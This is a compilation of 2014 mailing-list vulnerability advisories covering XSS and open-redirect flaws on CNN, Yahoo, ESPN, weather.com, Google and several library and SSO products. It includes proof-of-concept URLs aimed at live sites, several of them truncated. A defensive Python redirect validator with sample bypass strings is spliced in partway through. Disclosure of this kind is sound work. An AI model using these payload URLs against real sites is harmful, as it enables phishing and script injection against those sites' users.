http://travel.cnn.com/city/all/all/tokyo/all' /">
http://travel.cnn.com/city/all/all/bangkok/all' /">


*(1.1) Poc Video:*
https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be

*Blog Details:*
http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-city-related-links.html




*(2) CNN cnn.com ADS Open Redirect Security Vulnerability*


*Domain:*
http://ads.cnn.com



*Vulnerability Description:*

The vulnerability occurs at the "http://ads.cnn.com/event.ng" page with the
"&Redirect" parameter, i.e.
http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com

The vulnerability can be attacked without user login. Tests were performed
on Chrome 32 in Windows 8 and Safari 6.16 in Mac OS X v10.7.


*(2.1)* Use the following tests to illustrate the scenario painted above.

The redirected webpage address is "http://www.tetraph.com/blog". Suppose
that this webpage is malicious.

*Vulnerable URL:*
http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fcnn.com

*Poc Code:*
http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2ftetraph.com%2Fblog



*(2.2) Poc Video:*
https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-ads-open-redirect-security.html






Those vulnerabilities were reported to CNN in early July via the contact
information here:
http://edition.cnn.com/feedback/#cnn_FBKCNN_com








Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.
http://www.tetraph.com/wangjing/






*Blog Details:*
http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-xss-and-ads-open.html








--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore



[FD] CVE-2014-7294 Ex Libris Patron Directory Services (PDS) Open Redirect Security Vulnerability

2014-12-29 Thread Jing Wang
*CVE-2014-7294  Ex Libris Patron Directory Services (PDS) Open Redirect
Security Vulnerability*



Exploit Title: Ex Libris Patron Directory Services (PDS) Logon Page url
Parameter Open Redirect
Product: Ex Libris Patron Directory Services (PDS)
Vendor: Ex Libris
Vulnerable Versions: 2.1 and probably prior
Tested Version: 2.1
Advisory Publication: DEC 29, 2014
Latest Update: DEC 29, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7294
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]





*Advisory Details:*

*(1) Vendor URL:*
http://www.exlibrisgroup.org/display/CrossProductCC/PDS+OpenSSO+Integration



*Product Description:*
“Ex Libris is a leading worldwide developer and provider of
high-performance applications for libraries, information centres, and
researchers.”

“The Patron Directory Services (PDS) module provides a seamless single
sign-on (SSO) environment for all Ex Libris products, such as Aleph,
Metalib, Primo, DigiTool, Rosetta …”

It is one of the largest library management systems, used by large
numbers of universities and institutions.





*(2) Vulnerability Details:*

Ex Libris Patron Directory Services (PDS) can be exploited by Open Redirect
Attacks.


*(2.1) *The vulnerability occurs at “PDS” service’s logon page, with “&url”
parameter.






*References:*
http://tetraph.com/security/cves/cve-2014-7294-ex-libris-patron-directory-services-pds-open-redirect-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7294







--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore


[FD] CVE-2014-7293 Ex Libris Patron Directory Services (PDS) XSS (Cross-Site Scripting) Security Vulnerability

2014-12-28 Thread Jing Wang
*CVE-2014-7293 Ex Libris Patron Directory Services (PDS) XSS (Cross-Site
Scripting) Security Vulnerability*




Exploit Title: Ex Libris Patron Directory Services (PDS) Logon Page url
Parameter XSS
Product: Ex Libris Patron Directory Services (PDS)
Vendor: Ex Libris
Vulnerable Versions: 2.1 and probably prior
Tested Version: 2.1
Advisory Publication: DEC 29, 2014
Latest Update: DEC 29, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7293
Risk Level: Medium
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor URL:*
http://www.exlibrisgroup.org/display/CrossProductCC/PDS+OpenSSO+Integration


*Product Description:*

“Ex Libris is a leading worldwide developer and provider of
high-performance applications for libraries, information centres, and
researchers.”

The Patron Directory Services (PDS) module provides a seamless single
sign-on (SSO) environment for all Ex Libris products, such as Aleph,
Metalib, Primo, DigiTool, Rosetta …

It is one of the largest library management systems, used by large
numbers of universities and institutions.





*(2) Vulnerability Details:*

Patron Directory Services (PDS) can be exploited by XSS Attacks.


*(2.1)* The vulnerability occurs at the “PDS” service’s logon page, with the
“&url” parameter.






*References:*
http://tetraph.com/security/cves/cve-2014-7293-ex-libris-patron-directory-services-pds-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7293









--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore


[FD] Yahoo Yahoo.com Yahoo.co.jp Open Redirect Security Vulnerabilities

2014-12-18 Thread Jing Wang
*Yahoo Yahoo.com Yahoo.co.jp Open Redirect Security Vulnerabilities*



Though Yahoo lists open redirect vulnerabilities in its bug bounty program,
it seems Yahoo does not take this vulnerability seriously at all.

Multiple Open Redirect vulnerabilities were reported to Yahoo. All of
Yahoo's responses were that this is "intended behavior". However, these
vulnerabilities were patched later.

Several other security researchers complained about getting similar
treatment, too.
http://seclists.org/fulldisclosure/2013/Nov/198
http://seclists.org/fulldisclosure/2014/Jan/51
http://seclists.org/fulldisclosure/2014/Feb/119


All Open Redirect Vulnerabilities are intended behavior? If so, why patch
them later?



The vulnerability can be attacked without user login. Tests were performed
on Firefox (33.0) in Ubuntu (14.04) and IE (10.0.9200.16521) in Windows 8.




*(1) Yahoo.com Open Redirect*

*Vulnerable URLs:*
http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html

http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com

http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com



*Poc Video:*
https://www.youtube.com/watch?v=k4eFLsTyZkg

*Another Video Published Before:*
https://www.youtube.com/watch?v=GTd1Gkj6OUY


*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html
http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html






*(2) Yahoo.co.jp Open Redirect*

One webpage is used for the following tests. The webpage address is
"http://www.inzeed.com/kaleidoscope". Suppose that this webpage is malicious.

*Vulnerable URL:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp

*POC:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope



*Poc Video:*
https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be

*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html






Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore
http://www.tetraph.com/wangjing






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html



[FD] CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting) Security Vulnerability

2014-12-18 Thread Jing Wang
*CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting)
Security Vulnerability*




Exploit Title: TennisConnect "TennisConnect COMPONENTS System" /index.cfm
pid Parameter XSS
Product: TennisConnect COMPONENTS System
Vendor: TennisConnect
Vulnerable Versions: 9.927
Tested Version: 9.927
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8490
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]









*Advisory Details:*


*(1) Vendor URL:*
http://www.tennisconnect.com/products.cfm#Components


*Product Description:*
TennisConnect COMPONENTS
* Contact Manager (online player database)
* Interactive Calendar including online enrollment
* League & Ladder Management through Tencap Tennis
* Group Email (including distribution lists, player reports, unlimited
sending volume and frequency)
* Multi-Administrator / security system with Page Groups
* Member Administration
* MobileBuilder
* Online Tennis Court Scheduler
* Player Matching (Find-a-Game)
* Web Site Builder (hosted web site and editing tools at www. your domain
name .com)




*(2) Vulnerability Details:*

TennisConnect COMPONENTS System is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at "/index.cfm?" page, with "&pid"
parameter.








*References:*
http://tetraph.com/security/cves/cve-2014-8490-tennisconnect-components-system-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8490








--
Wang Jing
School of Physical and Mathematical Sciences
Nanyang Technological University, Singapore



[FD] CVE-2014-8752 JCE-Tech "Video Niche Script" XSS (Cross-Site Scripting) Security Vulnerability

2014-12-18 Thread Jing Wang
*CVE-2014-8752 JCE-Tech "Video Niche Script" XSS (Cross-Site Scripting)
Security Vulnerability*



Exploit Title: JCE-Tech "Video Niche Script" /view.php Multiple Parameters
XSS
Product: "Video Niche Script"
Vendor: JCE-Tech
Vulnerable Versions: 4.0
Tested Version: 4.0
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8752
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]




*Advisory Details:*


*(1) Vendor URL:*
http://jce-tech.com/products/


*Product Description:*
"The PHP Video Script instantly creates a niche video site based on
keywords users control via the admin console. The videos are displayed  on
users' site, but streamed from the YouTube servers."




*(2) Vulnerability Details:*

JCE-Tech "Video Niche Script" is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at "view.php" page with "video", "title"
parameters.





*References:*

http://tetraph.com/security/cves/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8752



[FD] ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

2014-12-09 Thread Jing Wang
*ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege
Escalation Security Vulnerabilities*





*Domain:*
http://espn.go.com/


"As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States. In addition to the flagship channel and its seven
related channels in the United States, ESPN broadcasts in more than 200
countries, operating regional channels in Australia, Brasil, Latin America
and the United Kingdom, and owning a 20% interest in The Sports Network
(TSN) as well as its five sister networks and NHL Network in Canada."
(Wikipedia)






*Vulnerability description:*

Espn.go.com has a security problem. It is vulnerable to XSS (Cross Site
Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.


Those vulnerabilities are very dangerous, since they occur on ESPN's
"login" & "register" pages, which are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given below, a large number of ESPN's
links were vulnerable to those attacks.


The vulnerability occurs at "espn.go.com"'s "login?" & "register" pages
with "redirect" parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0.7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn®FormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459";>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn®FormId=espn";>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate";>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login";>




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html





*(2) Dest Redirect Privilege Escalation Vulnerability*

One webpage is used for the following tests. The webpage address is
"http://www.diebiyi.com/". Suppose that this webpage is malicious.


*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112


[FD] CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints" Dest Redirect Privilege Escalation Security Vulnerability

2014-12-09 Thread Jing Wang
*CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints"
Dest Redirect Privilege Escalation Security Vulnerability*





Exploit Title: "Ping Identity Corporation" "PingFederate 6.10.1 SP
Endpoints" Dest Redirect Privilege Escalation Security Vulnerability
Product: PingFederate 6.10.1 SP Endpoints
Vendor: Ping Identity Corporation
Vulnerable Versions: 6.10.1
Tested Version: 6.10.1
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]
CVE Reference: CVE-2014-8489
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]








*Advisory Details*



*(1) Product:*
"PingFederate is a best-of-breed Internet-identity security platform that
implements multiple standards-based protocols to provide cross-domain
single sign-on (SSO) and user-attribute exchange, as well as support for
identity-enabled Web Services and cross-domain user provisioning."




*(2) Vulnerability Details:*
PingFederate 6.10.1 SP Endpoints is vulnerable to Dest Redirect Privilege
Escalation attacks.

The security vulnerability occurs at "/startSSO.ping?" page with
"&TargetResource" parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-8489-ping-identity-corporation-pingfederate-6-10-1-sp-endpoints-dest-redirect-privilege-escalation-security-vulnerability/
http://documentation.pingidentity.com/display/PF610/PingFederate+6.10
http://cwe.mitre.org
http://cve.mitre.org/



[FD] CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2014-12-09 Thread Jing Wang
*CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*







Exploit Title: goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: WebPress
Vendor: goYWP
Vulnerable Versions: 13.00.06
Tested Version: 13.00.06
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8751
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details:*

*(1) Product*
"WebPress is the foundation on which we build web sites. It’s our unique
Content Management System (CMS), flexible enough for us to build your dream
site, and easy enough for you to maintain it yourself."



*(2) Vulnerability Details:*
goYWP WebPress is vulnerable to XSS attacks.

*(2.1)* The first security vulnerability occurs at "/search.php" page with
"&search_param" parameter in HTTP GET.

*(2.2)* The second security vulnerability occurs at the "/forms.php" (form
submission) page with the "&name", "&address" and "&comment" parameters in
HTTP POST.










*References:*
http://tetraph.com/security/cves/cve-2014-8751-goywp-webpress-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://www.goywp.com/view/cms
http://www.goywp.com/demo.php
http://cwe.mitre.org
http://cve.mitre.org/


[FD] All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (cross site scripting) Attacks

2014-11-26 Thread Jing Wang
*All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to
XSS (cross site scripting) Attacks*




*Domain Description:*

http://www.indiatimes.com


"According to the Indian Readership Survey (IRS) 2012, the Times of India
is the most widely read English newspaper in India with a readership of
7.643 million. This ranks the Times of India as the top English daily in
India by readership." (en.Wikipedia.org )







*Vulnerability description:*


The vulnerability occurs in Indiatimes's URL links. Indiatimes only filters
part of the filenames on its website. All URLs under Indiatimes's
"photogallery" and "top-lists" topics are affected.


Indiatimes uses part of the links under the "photogallery" and "top-lists"
topics to construct its website content without any checking of those links
at all. This mistake is very common in today's websites; developers are not
security experts.



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





*POC Codes:*

http://www.indiatimes.com/photogallery/";>

http://www.indiatimes.com/top-lists/";>

http://www.indiatimes.com/photogallery/lifestyle/";>

http://www.indiatimes.com/top-lists/technology/";>





*POC Video:*

https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html






The vulnerabilities were reported to Indiatimes in early September, 2014.
However they are still unpatched.









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/



[FD] CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege Escalation

2014-11-26 Thread Jing Wang


*CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege
Escalation*





Exploit Title: WordPress Ad-Manager Plugin Dest Redirect Privilege
Escalation Vulnerability

Product: WordPress Ad-Manager Plugin

Vendor: CodeCanyon

Vulnerable Versions: 1.1.2

Tested Version: 1.1.2

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]

CVE Reference: CVE-2014-8754

CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N)

Impact Subscore: 4.9

Exploitability Subscore: 8.6

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

“WordPress Ad-Manager offers users a simple solution to implement
advertising into their posts, their blog or any other WordPress page. Users
can use pictures and images or HTML snippets like Google AdSense to
incorporate advertising in an easy way.”



*(2) Vulnerability Details:*

The Dest Redirect Privilege Escalation vulnerability occurs at
“track-click.php” page with “&out” parameter.






*References:*

http://tetraph.com/security/cves/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/

http://codecanyon.net/item/wordpress-admanager/544421

https://wordpress.org/plugins/ad-manager-for-wp/

http://cwe.mitre.org

http://cve.mitre.org/

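The open redirect advisories on this page (CNN ads "Redirect", Yahoo, ESPN "redirect"/"appRedirect", Ex Libris PDS "url", PingFederate "TargetResource", Ad-Manager "out") all come down to one missing check on a destination parameter. The following is an added example, not code from any of those products or sites: the prefix check that such parameters are often "protected" by, a validator that rejects the encodings browsers resolve off-site, and a helper for classifying a captured 3xx response during testing. The host names and the allow-list are assumptions for the demo.

```python
"""Added example (not vendor code): validating a redirect-destination parameter
(CWE-601) and classifying a captured Location header.  ALLOWED_HOSTS and
SITE_BASE are assumptions for the demo."""
from urllib.parse import urljoin, urlsplit

# Assumed: the only hosts this site may send a browser to after login / click tracking.
ALLOWED_HOSTS = {"example-site.test", "www.example-site.test"}
SITE_BASE = "http://example-site.test/"


def weak_check(target: str) -> bool:
    """A typical broken filter: accept anything that starts with the site's URL.
    Passes "http://example-site.test.evil.test/" and "http://example-site.test@evil.test/"."""
    return target.startswith("http://example-site.test")


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Return `target` if it is a rooted same-site path or an allow-listed absolute
    http(s) URL; otherwise return `default` (fail closed, never the attacker's value)."""
    # Control characters and whitespace: CRLF header injection, and browsers strip
    # them before parsing, so "\t//evil.test" would still resolve off-site.
    if not target or any(ord(c) < 0x21 or ord(c) == 0x7F for c in target):
        return default
    # Browsers treat "\" as "/", so "/\evil.test" is "//evil.test".
    if "\\" in target:
        return default
    # Protocol-relative "//evil.test" and "///evil.test" keep the attacker's host.
    if target.startswith("//"):
        return default
    try:
        parts = urlsplit(target)
    except ValueError:                       # e.g. malformed IPv6 literal
        return default
    if parts.scheme:
        # Absolute URL: http(s) only (no javascript:/data:), allow-listed host only,
        # and no userinfo ("http://example-site.test@evil.test/" has hostname evil.test).
        if parts.scheme.lower() not in ("http", "https"):
            return default
        if parts.username is not None or parts.hostname not in ALLOWED_HOSTS:
            return default
        return target
    # No scheme: require a rooted path.  Bare "evil.test" or "@evil.test" is rejected.
    if not target.startswith("/"):
        return default
    return target


def redirect_leaves_site(status: int, location: str) -> bool:
    """Tester's check for a captured response: resolve Location the way a browser
    would (relative to the site) and ask whether it lands outside ALLOWED_HOSTS."""
    if status not in (301, 302, 303, 307, 308) or not location:
        return False
    return urlsplit(urljoin(SITE_BASE, location)).hostname not in ALLOWED_HOSTS


if __name__ == "__main__":
    for candidate in (
        "/members/modifyNewsletters",
        "http://example-site.test/home",
        "http://example-site.test.evil.test/",   # weak_check says yes
        "http://example-site.test@evil.test/",   # weak_check says yes
        "//evil.test/", "///evil.test/", "/\\evil.test",
        "javascript:alert(1)", "http:evil.test",
    ):
        print(f"{candidate!r:45} weak={weak_check(candidate)!s:5} "
              f"safe={safe_redirect_target(candidate)!r}")
```

Returning a fixed default rather than "sanitising" the value is deliberate: every rewrite rule is a new parsing difference between the server and the browser. If the product must support off-site destinations (the SSO TargetResource case), the allow-list is the configuration, not a string prefix.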

[FD] CVE-2014-7291 Springshare LibCal XSS (Cross-Site Scripting) Vulnerability

2014-11-26 Thread Jing Wang
*Exploit Title: Springshare LibCal XSS (Cross-Site Scripting) Vulnerability*

Product: LibCal

Vendor: Springshare

Vulnerable Versions: 2.0

Tested Version: 2.0

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-7291

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Solution Status: Fixed by Vendor

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

"Springshare LibCal is an easy to use calendaring and event management
platform for libraries. Used by 1,600+ libraries worldwide."



*(2) Vulnerability Details:*

The XSS vulnerabilities occur at "/api_events.php?" page, with "&m" and
"&cid" parameters.



*(3) Solutions:*

2014-10-01: Report vulnerability to Vendor

2014-10-15: Vendor replied with thanks and changed the source code









*References:*

http://tetraph.com/security/cves/cve-2014-7291-springshare-libcal-xss-cross-site-scripting-vulnerability/

http://www.springshare.com/libcal/

http://cwe.mitre.org

http://cve.mitre.org/



[FD] The Weather Channel weather.com Almost All Links Vulnerable to XSS Attacks

2014-11-26 Thread Jing Wang
*The Weather Channel weather.com Almost All Links Vulnerable to XSS Attacks*





Domain Description:

http://www.weather.com/


"The Weather Channel is an American basic cable and satellite television
channel which broadcasts weather forecasts and weather-related news and
analyses, along with documentaries and entertainment programming related to
weather."


"As of August 2013, The Weather Channel was received by approximately
99,926,000 American households that subscribe to a pay television service
(87.50% of U.S. households with television), making it the most common
cable channel in the country." (Wikipedia)






*Vulnerability description:*


Almost all links under the weather.com domain are vulnerable to XSS attacks:
an attacker only needs to append script to the end of a Weather Channel URL,
and the script is executed.


About ten thousand links were tested with a self-written tool; 76.3% of the
weather.com links tested were vulnerable to XSS attacks.


The cause of the vulnerability is that weather.com builds its HTML tags from
the request URL without filtering out script content.


The vulnerability can be exploited without logging in. Tests were performed
on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.





*POC Codes, e.g.*

http://www.weather.com/slideshows/main/"--/>">

http://www.weather.com/home-garden/home/white-house-lawns-20140316%22--/"--/>">t%28%27justqdjing%27%29%3E

http://www.weather.com/news/main/";>






*POC Video:*

https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/the-weather-channel-weather.html





The Weather Channel patched this vulnerability in late November 2014 (the
week before this post).









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/



[FD] CVE-2014-7290 Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability

2014-11-14 Thread Jing Wang
CVE-2014-7290  Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability


Exploit Title: Atlas Systems Aeon XSS Vulnerability
Product: Aeon
Vendor: Atlas Systems
Vulnerable Versions: 3.6, 3.5
Tested Version: 3.6
Advisory Publication: Nov 12, 2014
Latest Update: Nov 12, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7290
Solution Status: Fixed by Vendor
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





Advisory Details:

(1) Aeon

Aeon is special collections circulation and workflow automation software
for your special collections library designed by special collections
librarians.

Aeon improves customer service and staff efficiency while providing
unparalleled item tracking, security and statistics.



(2) However, it is vulnerable to XSS attacks.

(2.1) The first vulnerability occurs on the "aeon.dll" page, in the "Action"
parameter.
(2.2) The second vulnerability occurs on the "aeon.dll" page, in the "Form"
parameter.




Solutions:
2014-09-01: Report vulnerability to Vendor
2014-10-05: Vendor replied with thanks and said it would change the source
code





References:
http://tetraph.com/security/xss-vulnerability/cve-2014-7290-atlas-systems-aeon-xss-cross-site-scripting-vulnerability/
https://prometheus.atlas-sys.com/display/aeon/Aeon+3.6+Release+Notes
http://cwe.mitre.org
http://cve.mitre.org/



[FD] Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

2014-11-14 Thread Jing Wang
Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

-- Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net




The vulnerability exists on the "Logout" page, in the "continue" parameter, e.g.
https://www.google.com/accounts/Logout?service=writely&continue=https://googleads.g.doubleclick.net



The vulnerability can be exploited without logging in. Tests were performed
on Firefox (26.0) on Ubuntu (12.04) and IE (9.0.15) on Windows 7.



(1) When a user is redirected from Google to another site, Google checks
whether the redirect target belongs to a domain on Google's whitelist (the
whitelist usually contains websites belonging to Google), e.g.
docs.google.com
googleads.g.doubleclick.net



If it does, the redirection is allowed.

However, if URLs on a whitelisted domain have open URL redirection
vulnerabilities themselves, a user can be redirected from Google to a
vulnerable URL on that domain first and then from that vulnerable site to a
malicious site. The effect is the same as being redirected from Google
directly.

One of the vulnerable domains is
googleads.g.doubleclick.net (Google's Ad System)
